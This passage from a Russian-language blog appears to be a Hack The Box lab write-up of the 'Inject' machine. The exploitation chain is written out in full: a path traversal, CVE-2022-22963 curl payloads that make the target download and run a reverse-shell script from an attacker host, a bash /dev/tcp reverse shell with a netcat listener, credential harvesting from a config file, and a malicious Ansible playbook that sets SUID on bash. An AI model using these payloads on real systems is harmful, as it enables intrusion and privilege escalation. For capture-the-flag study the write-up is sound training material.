  <li><code class="language-plaintext highlighter-rouge">http://10.10.11.204:8080/register</code> - стоит заглушка;</li>
  <li><code class="language-plaintext highlighter-rouge">http://10.10.11.204:8080/upload</code> - интересное для нас место, которе позволяет загружать файлы. К нему мы ещё вернёмся.</li>
</ul>

<h2 id="получение-флага-usertxt">Получение флага “user.txt”</h2>

<p>Ранее нами был найден довольно занимательный URL адрес: <code class="language-plaintext highlighter-rouge">http://10.10.11.204:8080/upload</code>.</p>

<p>Пройдя по нему мы можем загрузить картинку. Загрузив картинку нам тут же предлагают её просмотреть:
<img src="/assets/images/HTB_writeup_Inject/4.png" alt="web page" /></p>

<p>Данная возможность нас должна привлечь, так как есть вероятность на возможность просмотра какого угодно файла и тем самым мы получим уязвимость <code class="language-plaintext highlighter-rouge">Path Traversal</code>. проверим свою гипотезу, перехватив запрос с помощью <a href="https://portswigger.net/burp">Burp Suite</a> и исследовав его.</p>

<p>Перехватив запрос мы видим, что имя нашего файла, который мы только что залили, передаётся в качестве аргументов. Попробуем спустится на уровень выше по файловой системе и посмотрим что у нас получится. И по итогу у нас получилось! Наша гипотеза верна и вот что мы увидим по итогу:
<img src="/assets/images/HTB_writeup_Inject/5.png" alt="Path Traversal" /></p>

<p>Здесь мы так же можем видить файл или директорию (но скорее директорию) под названием <code class="language-plaintext highlighter-rouge">java</code>. Это означает что само веб-приложение написанно с использованием стека технологий, свойственного языку программирования <code class="language-plaintext highlighter-rouge">java</code>.  Изучая исходные файлы мы видим это:
<img src="/assets/images/HTB_writeup_Inject/6.png" alt="read source code" /></p>

<p>Изучая импорты в исходниках, мы видим, что использовался <code class="language-plaintext highlighter-rouge">Spring Framework</code>. Этот момент поднаталкивает к мысли попробовать проэксплуатировать одну из популярнийших уязвимостей 2022 года - Spring4Shell (<a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-22963">CVE-2022-22963</a>).</p>

<p><a href="https://github.com/me2nuk/CVE-2022-22963">Пользуясь информацией из данного источника</a>, узнаём, что эксплуатация происходит следующем образом: мы отправляем POST запрос на сервер по пути в URL <code class="language-plaintext highlighter-rouge">/functionRouter</code> с заголовком <code class="language-plaintext highlighter-rouge">"spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec('&lt;RCE&gt;')"</code>, где <code class="language-plaintext highlighter-rouge">&lt;RCE&gt;</code> - непосредственно полезная нагрузка, которая будет выполнена <code class="language-plaintext highlighter-rouge">bash</code>. Так же при этом нужно отправить что либо в виде RAW DATA.</p>

<p>Попробуем с помощью утилиты <a href="https://curl.se/">curl</a> создать файл helloHERE.txt в директории /tmp. Результат мы сможем проверить с помощью ранее найденной <code class="language-plaintext highlighter-rouge">Path Traversal</code>. Вот что у нас получится:</p>

<p><img src="/assets/images/HTB_writeup_Inject/7.png" alt="spring4shell" /></p>

<p>Мы успешно смогли создать файл! А значит данное веб приложение подверженно <code class="language-plaintext highlighter-rouge">RCE</code> и мы потенциально можем проникнуть на сервер.</p>

<p>Суть нашего проникновения на сервер будет заключаеться в создании <code class="language-plaintext highlighter-rouge">ReverseShell</code>, то есть инциировании соединения от лица машины жертвы на машину атакующего с передачей атакующему командной оболочки. Наш <code class="language-plaintext highlighter-rouge">ReverseShell</code> будет в качетсве файла <code class="language-plaintext highlighter-rouge">RS.sh</code> со следующим содержимым:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
bash <span class="nt">-i</span> <span class="o">&gt;</span>&amp; /dev/tcp/&lt;IP_of_attacker&gt;/&lt;port_of_dest&gt; 0&gt;&amp;1
</code></pre></div></div>

<blockquote>
  <p>Для формирования разного рода ReverseShell нагрузкок очень хорошо подойдёт следующий <a href="https://www.revshells.com/">ресурс</a>. А использование в качестве прослушивателя <code class="language-plaintext highlighter-rouge">rlwrap -cAr nc -lvnp &lt;port&gt;</code> позволяет сохранять историю команд. Так же всегда стоит для удобства настраивать разного рода переменные окружения для оболочки для удобства и вызывать на всякий случай через python ещё раз bash оболочку, так как в ином случае может быть что мы имеем дело с слегка ограниченной оболочкой. Такими темпами мы очень облегчим себе труды.</p>
</blockquote>

<p>Данная команда осуществит вызов <code class="language-plaintext highlighter-rouge">bash</code> в интерактивном режиме, где все стандартные потоки вывода и вывода ошибок будут перенаправленны в сетевое устройстви, которое в нашем случае будет сетевым подключением, в свою очередь от которого стандартный поток ввода будет передаваться на стандартный поток вывода.</p>

<p>Данный <code class="language-plaintext highlighter-rouge">ReverseShell</code> мы поместим в директорию <code class="language-plaintext highlighter-rouge">/tmp</code> и выполним, при этом в свою очередь будем принимать сетевое подключение с помощью утилиты <a href="https://netcat.sourceforge.net/">netcat</a> и команда для этого ожидания подключения примет следующий вид: <code class="language-plaintext highlighter-rouge">nc -nvpl 1337</code>, где <code class="language-plaintext highlighter-rouge">1337</code> - номер порта, на который мы ожидаем получить подключение.</p>

<p>Так же в директории, в которой у нас хранится <code class="language-plaintext highlighter-rouge">RS.sh</code> файл, мы поднимем <code class="language-plaintext highlighter-rouge">http сервер</code>, так как свой файл мы загрузим на хост атакуемого. Запуск <code class="language-plaintext highlighter-rouge">http сервера</code> на <code class="language-plaintext highlighter-rouge">80 порту</code> произведём с помощью команды <code class="language-plaintext highlighter-rouge">sudo python3 -m http.server 80</code>.</p>

<p>Дальнейние команды для отправки файла и его запуска на сервере примут следующий вид:</p>

<ul>
  <li>
    <p><code class="language-plaintext highlighter-rouge">curl -X POST http://10.10.11.204:8000/functionRouter -H "spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec('curl http://&lt;IP_address_of_attacker&gt;/RS.sh -o /tmp/RS.sh')" --data-raw 'data' -v</code></p>
  </li>
  <li>
    <p><code class="language-plaintext highlighter-rouge">curl -X POST http://10.10.11.204:8000/functionRouter -H "spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec('bash /tmp/RS.sh')" --data-raw 'data' -v</code></p>
  </li>
</ul>

<p>После всех этих действий, мы попадаем в систему под учётной записью <code class="language-plaintext highlighter-rouge">frank</code>:
<img src="/assets/images/HTB_writeup_Inject/8.png" alt="access as frank" /></p>

<p>Теперь перейдём в домашнюю директорию данного пользователя с помощью команды <code class="language-plaintext highlighter-rouge">cd</code>. В надежде увидеть файл <code class="language-plaintext highlighter-rouge">user.txt</code> нас ждёт облом. А это значит что непривилегированный пользователь не один в системе. Cпустимcя на уровень выше по файловой системе и обнаружим там корневую директорию пользователя <code class="language-plaintext highlighter-rouge">phil</code>. Перейдя в неё, мы найдём заветный файл, но само собой мы не сможем прочесть его.</p>

<p>Но возможно мы недостаточно осмотрели свою корневую домашнюю директорию. Перейдя в неё попробуем вывести содержимое с помощью <code class="language-plaintext highlighter-rouge">ls -a</code> и мы обнаружим в скрытых файлах некий файл <code class="language-plaintext highlighter-rouge">.m2</code>. При попытки прочесть содержимое файла нам подсказывают, что это директория. Перейдя в неё, находим файл <code class="language-plaintext highlighter-rouge">settings.xml</code>. Прочитав его, узнаем учётные данные пользователя <code class="language-plaintext highlighter-rouge">phil</code>:</p>

<p><img src="/assets/images/HTB_writeup_Inject/9.png" alt="find credential of phil" /></p>

<p>Авторизуемся как <code class="language-plaintext highlighter-rouge">phil</code> с помощью <code class="language-plaintext highlighter-rouge">su phil</code>, а затем введём <code class="language-plaintext highlighter-rouge">bash -i</code> для получения интерактивной оболочки. Переместимся в его домашнюю директорию и заберём флаг!</p>

<p><img src="/assets/images/HTB_writeup_Inject/10.png" alt="user flag" /></p>

<h2 id="получение-флага-roottxt">Получение флага “root.txt”</h2>

<p>Есть несколько способов повысить свои привелегии в системе до прав <code class="language-plaintext highlighter-rouge">root</code> пользователя. Можно с помощью <code class="language-plaintext highlighter-rouge">sudo -l</code> узнать, на выполнение каких привилегированных команд у нас есть права или же и вовсе найти файлы с установленным <code class="language-plaintext highlighter-rouge">SUID</code> битом с помощью <code class="language-plaintext highlighter-rouge">find / -perm -u=s -type f 2&gt;/dev/null</code> и тем самым найти какой либо недочёт в разграничении прав доступа (к примеру используя <a href="https://gtfobins.github.io/">GTFO</a>), но не один из этих способов ни к чему не привёл. Тогда мы можем заметить в корневой директории каталог <code class="language-plaintext highlighter-rouge">/opt</code>, в котором обычно устанавливается дополнительное программное обеспечение. Перейдём в него и поищем что - нибудь интересное. По пути <code class="language-plaintext highlighter-rouge">/opt/automation/tasks/</code> находим файл <code class="language-plaintext highlighter-rouge">playbook_1.yml</code>. Прочитав его, понимаем, что это конфигурационный файл для <code class="language-plaintext highlighter-rouge">ansible</code> - система управления конфигруациями.</p>

<p>Данная система работает с правами <code class="language-plaintext highlighter-rouge">root</code>. Для компрометации системы принимаем решение написать вредоносную конфигурацию, который установил бы <code class="language-plaintext highlighter-rouge">SUID</code> бит у оболочки <code class="language-plaintext highlighter-rouge">bash</code>. Изучая особенности данной технологии и опираясь на <a href="https://rioasmara.com/2022/03/21/ansible-playbook-weaponization/">источник</a>, содаём вредоносный <code class="language-plaintext highlighter-rouge">yml файл</code>, который назовём <code class="language-plaintext highlighter-rouge">evil_root.yml</code> со следующим содержимым:</p>
<div class="language-yml highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="pi">-</span> <span class="na">hosts</span><span class="pi">:</span> <span class="s">localhost</span>
  <span class="na">tasks</span><span class="pi">:</span>
    <span class="pi">-</span> <span class="na">name</span><span class="pi">:</span> <span class="s">EvilRoot</span>
      <span class="na">ansible.builtin.shell</span><span class="pi">:</span>
        <span class="s">chmod +s /bin/bash</span>
      <span class="na">become</span><span class="pi">:</span> <span class="kc">true</span>
</code></pre></div></div>

<p>Так же в результате проведения эксперимента выяснилось, что в <code class="language-plaintext highlighter-rouge">/opt/automation/tasks/</code> мы можем копировать файлы, хотя создовать само собой не можем, так как недостаточно прав доступа.</p>

<p>Доставим этот файл в директорию <code class="language-plaintext highlighter-rouge">/tmp</code>, а оттуда скопируем данный файл в <code class="language-plaintext highlighter-rouge">/opt/automation/tasks/</code> и будем ждать, когда произойдёт считывание конфигураций и выполнение нашей полезной нагрузки. Затем вводим <code class="language-plaintext highlighter-rouge">bash -p</code> для запуска <code class="language-plaintext highlighter-rouge">bash</code> с привилегированными правами. В результате чего мы получаем необходимые права и забираем наш флаг!</p>

<p><img src="/assets/images/HTB_writeup_Inject/11.png" alt="root flag" /></p>

<p>На этом машина полностью под нашим контролем и это прекрасно!</p>

  </div><a class="u-url" href="/writeups/2025/04/30/HTB-Inject.html" hidden></a>
</article>

      </div>
    </main><footer class="site-footer h-card">
  <data class="u-url" href="/"></data>

  <div class="wrapper">

    <h2 class="footer-heading">Raven Blog</h2>

    <div class="footer-col-wrapper">
      <div class="footer-col footer-col-1">
        <ul class="contact-list">
          <li class="p-name">Raven Blog</li><li><a class="u-email" href="mailto:komogorovkirill82@gmail.com">komogorovkirill82@gmail.com</a></li></ul>
      </div>

      <div class="footer-col footer-col-2"><ul class="social-media-list"><li><a href="https://github.com/cyberravenman"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#github"></use></svg> <span class="username">cyberravenman</span></a></li><li><a href="https://www.linkedin.com/in/kirill-komogorov-b0a692354"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#linkedin"></use></svg> <span class="username">kirill-komogorov-b0a692354</span></a></li><li><a href="https://www.twitter.com/cyberravenman"><svg class="svg-icon"><use xlink:href="/assets/minima-social-icons.svg#twitter"></use></svg> <span class="username">cyberravenman</span></a></li></ul>
</div>

      <div class="footer-col footer-col-3">
        <p>Блог о кибербезопасности, Blue Team, Red Team и IT в целом</p>
      </div>
    </div>

  </div>

</footer>
</body>

</html>
